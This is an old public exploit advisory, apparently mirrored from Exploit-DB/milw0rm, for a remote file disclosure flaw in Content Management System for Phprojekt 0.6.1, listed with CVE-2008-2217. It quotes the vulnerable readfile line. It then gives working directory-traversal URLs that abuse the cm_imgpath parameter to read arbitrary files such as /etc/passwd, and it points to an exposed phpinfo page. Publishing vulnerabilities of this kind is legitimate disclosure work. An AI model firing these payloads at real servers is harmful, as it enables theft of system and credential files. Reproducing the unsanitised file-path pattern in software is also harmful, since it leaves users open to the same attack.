Lucene search
HoussamixEDB-ID:5510HistoryApr 27, 2008 - 12:00 a.m.
Content Management System for Phprojekt 0.6.1 - File Disclosure
2008-04-2700:00:00
Houssamix
www.exploit-db.com
27
AI Score
7.4
Confidence
Low
--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
= Author : HouSSaMix
= Script : Content Management System for Phprojekt
= version : 0.6.1
= Download : http://www.mariovaldez.net/software/cm_4p/download.php
= BUG : Remote File Disclosure Vulnerability
Vulnerable CODE :
~~~~~~~~ graphie.php ~~~~~~~~~~~~~~~~~
readfile ($cm_imgpath . "/t.gif");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
variable " $cm_imgpath " not declared
= Exploit :
target.com/cm/graphie.php?cm_imgpath=../.././../[file]
target.com/cm/graphie.php?cm_imgpath=../.././../etc/passwd
= see phpinfo
target.com/cm/phpinfo.php
= greetz : V40 - marwen.neo and all muslims Hackers
=================================================================================================================
# milw0rm.com [2008-04-27]Related
cve
cve
CVE-2008-2217
2008-05-14 18:20:00
prion
prion
Directory traversal
2008-05-14 18:20:00
cvelist
cvelist
CVE-2008-2217
2008-05-14 18:00:00
nvd
nvd
CVE-2008-2217
2008-05-14 18:20:00